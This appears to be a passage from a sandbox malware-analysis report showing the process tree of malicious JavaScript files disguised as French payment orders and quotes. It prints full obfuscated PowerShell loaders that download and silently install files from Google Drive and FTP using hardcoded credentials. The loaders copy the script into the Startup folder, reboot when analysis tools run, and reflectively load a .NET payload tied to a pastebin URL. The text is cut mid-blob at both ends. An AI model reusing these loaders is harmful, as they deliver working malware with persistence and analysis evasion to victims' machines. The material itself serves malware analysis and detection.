[char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'sAG4AbA' + [char]66 + 'kAHkAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'sAG4AbA' + [char]66 + 'kAHkALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'sAG4AbA' + [char]66 + 'kAHkALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAYg' + [char]66 + 'xAHIAeg' + [char]66 + 'xACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAEkAWg' + [char]66 + '6AFkASgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'xAFIATw' + [char]66 + 'sAGsAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'xAFIATw' + [char]66 + 'sAGsAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQASQ' + [char]66 + 'aAHoAWQ' + [char]66 + 'KACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAYQ' + [char]66 + '' + [char]66 + 'AEEASQ' + [char]66 + 'lACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'ZAEQASw' + [char]66 + 'lAEIAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAxAC4AdA' + [char]66 + '4AHQAJwApADsAIAAkAGMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAIAA9ACAAKA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAAUA' + [char]66 + 'TAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAsACAAKA' + [char]66 + 'DAG8Abg' + [char]66 + '2AGUAcg' + [char]66 + '0AFQAbwAtAFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'lAFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACAALQ' + [char]66 + '' + [char]66 + 'AHMAUA' + [char]66 + 'sAGEAaQ' + [char]66 + 'uAFQAZQ' + [char]66 + '4AHQAIAAtAEYAbw' + [char]66 + 'yAGMAZQAgAC0AUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAA5ACwAIAAxADAAMgAsACAAMQAxADAALAAgADYAOQAsACAAMQAwADAALAAgADcANwAsACAANgA4ACwAIAA3ADYALAAgADEAMQAwACwAIAA2ADkALAAgADYANAAsACAANgA0ACwAIAA0ADkALAAgADUAMwAsACAANQA1ACwAIAA1ADYAIAApACkAKQApACkAOwA7AEkAbg' + [char]66 + '2AG8Aaw' + [char]66 + 'lAC0AVw' + [char]66 + 'lAGIAUg' + [char]66 + 'lAHEAdQ' + [char]66 + 'lAHMAdAAgAC0AVQ' + [char]66 + 'SAEkAIAAkAGEAQQ' + [char]66 + '' + [char]66 + 'AEkAZQAgAC0ATw' + [char]66 + '1AHQARg' + [char]66 + 'pAGwAZQAgACQAWQ' + [char]66 + 'EAEsAZQ' + [char]66 + 'CACAALQ' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sACAAJA' + [char]66 + 'jAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sACAALQ' + [char]66 + 'VAHMAZQ' + [char]66 + 'CAGEAcw' + [char]66 + 'pAGMAUA' + [char]66 + 'hAHIAcw' + [char]66 + 'pAG4AZwAgADsAYw' + [char]66 + 'tAGQALg' + [char]66 + 'lAHgAZQAgAC8AYwAgADsAcA' + [char]66 + 'pAG4AZwAgADEAMgA3AC4AMAAuADAALgAxACAAOw' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIAAtAGMAbw' + [char]66 + 'tAG0AYQ' + [char]66 + 'uAGQAIA' + [char]66 + '7ACQAWQ' + [char]66 + 'EAEsAZQ' + [char]66 + 'CACAAPQAgACgAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMQAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'uAHIAYg' + [char]66 + '5AGIAIAA9ACAAKAAgAEcAZQ' + [char]66 + '0AC0AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'lAG4AdAAgAC0AUA' + [char]66 + 'hAHQAaAAgACQAWQ' + [char]66 + 'EAEsAZQ' + [char]66 + 'CACAAKQAgADsASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUALQ' + [char]66 + 'XAGUAYg' + [char]66 + 'SAGUAcQ' + [char]66 + '1AGUAcw' + [char]66 + '0ACAALQ' + [char]66 + 'VAFIASQAgACQAbg' + [char]66 + 'yAGIAeQ' + [char]66 + 'iACAALQ' + [char]66 + 'PAHUAdA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACAAJA' + [char]66 + 'ZAEQASw' + [char]66 + 'lAEIAIAAtAFUAcw' + [char]66 + 'lAEIAYQ' + [char]66 + 'zAGkAYw' + [char]66 + 'QAGEAcg' + [char]66 + 'zAGkAbg' + [char]66 + 'nAH0AIAA7ACQAcQ' + [char]66 + 'hAHEAeA' + [char]66 + 'FACAAPQAgACgAIA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAkAFkARA' + [char]66 + 'LAGUAQgAgAC0ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nACAAVQ' + [char]66 + 'UAEYAOAApACAAOw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAGQAQw' + [char]66 + 'pAFcAegAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHEAYQ' + [char]66 + 'xAHgARQAuAFIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApACAAOwAkAG4Aag' + [char]66 + 'jAGIAcQAgAD0AIAAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALgAnACAAOwAkAEwATA' + [char]66 + 'RAHUAZAAgAD0AIAAnAEMAbA' + [char]66 + 'hAHMAcwAxACcAIAA7ACQAbg' + [char]66 + 'lAFUAbQ' + [char]66 + 'WACAAPQAgACcAcA' + [char]66 + 'yAEYAVg' + [char]66 + 'JACcAIAA7AFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAG8AbQ' + [char]66 + 'hAGkAbg' + [char]66 + 'dADoAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'kAEMAaQ' + [char]66 + 'XAHoAIAApAC4ARw' + [char]66 + 'lAHQAVA' + [char]66 + '5AHAAZQAoACAAJA' + [char]66 + 'uAGoAYw' + [char]66 + 'iAHEAIAArACAAJA' + [char]66 + 'MAEwAUQ' + [char]66 + '1AGQAIAApAC4ARw' + [char]66 + 'lAHQATQ' + [char]66 + 'lAHQAaA' + [char]66 + 'vAGQAKAAgACQAbg' + [char]66 + 'lAFUAbQ' + [char]66 + 'WACAAKQAuAEkAbg' + [char]66 + '2AG8Aaw' + [char]66 + 'lACgAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAQg' + [char]66 + 'tAGMAcQ' + [char]66 + '6AFgAMw' + [char]66 + 'QAC8Adw' + [char]66 + 'hAHIALw' + [char]66 + 'tAG8AYwAuAG4AaQ' + [char]66 + 'iAGUAdA' + [char]66 + 'zAGEAcAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgACwAIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAsACAAJw' + [char]66 + 'EACAARA' + [char]66 + 'EAFIAZQ' + [char]66 + 'nAEEAcw' + [char]66 + 'tACcAIAApACAAKQAgADsAfQA7AA==';$jPhaA = $jPhaA.replace('革','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\Admin\Downloads\BON_DE_REGLEMENT\ORDRE_VIREMENT.js') ;powershell $jPhaA
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$KATih = $host.Version.Major.Equals(2);If ( $KATih ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$bqrzq = 'https://drive.google.com/uc?export=download&id=';$lkMtu = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $lkMtu ) {$bqrzq = ($bqrzq + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$bqrzq = ($bqrzq + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$lnldy = ( New-Object Net.WebClient ) ;$lnldy.Encoding = [System.Text.Encoding]::UTF8 ;$lnldy.DownloadFile($bqrzq, ($HzOMj + '\Upwin.msu') ) ;$IZzYJ = ( 'C:\Users\' + [Environment]::UserName );qROlk = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe qROlk /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\BON_DE_REGLEMENT\ORDRE_VIREMENT.js' -Destination ( $IZzYJ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$aAAIe = ('ftp://[email protected]/Upcrypter' + '/02/DLL01.txt') ;$YDKeB = ([System.IO.Path]::GetTempPath() + 'dll01.txt'); $credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](109, 102, 110, 69, 100, 77, 68, 76, 110, 69, 64, 64, 49, 53, 55, 56 )))));;Invoke-WebRequest -URI $aAAIe -OutFile $YDKeB -Credential $credential -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$YDKeB = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$nrbyb = ( Get-Content -Path $YDKeB ) ;Invoke-WebRequest -URI $nrbyb -OutFile $YDKeB -UseBasicParsing} ;$qaqxE = ( Get-Content -Path $YDKeB -Encoding UTF8) ;[Byte[]] $dCiWz = [System.Convert]::FromBase64String( $qaqxE.Replace( '↓:↓' , 'A' ) ) ;$njcbq = 'ClassLibrary3.' ;$LLQud = 'Class1' ;$neUmV = 'prFVI' ;[System.AppDomain]::CurrentDomain.Load( $dCiWz ).GetType( $njcbq + $LLQud ).GetMethod( $neUmV ).Invoke($null, [object[]] ( 'BmcqzX3P/war/moc.nibetsap//:sptth' , 'C:\Users\Admin\Downloads\BON_DE_REGLEMENT\ORDRE_VIREMENT.js', 'D DDRegAsm' ) ) ;};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5388
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c
      4⤵
      PID:3728
  - - C:\Windows\system32\PING.EXE
      "C:\Windows\system32\PING.EXE" 127.0.0.1
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:5364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABZAEQASwBlAEIAIAA9ACAAKABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApACAAKwAgACcAZABsAGwAMAAxAC4AdAB4AHQAJwApACAAOwAkAG4AcgBiAHkAYgAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABZAEQASwBlAEIAIAApACAAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAJABuAHIAYgB5AGIAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAFkARABLAGUAQgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5832

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\BON_DE_REGLEMENT\DEVIS_VALIDE.js"
1⤵
- Checks computer location settings
PID:5428
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAHQAcA' + [char]66 + 'XAGsARgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'IAGgAWA' + [char]66 + 'IAEIAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'IAGgAWA' + [char]66 + 'IAEIAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAdA' + [char]66 + 'wAFcAaw' + [char]66 + 'GACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 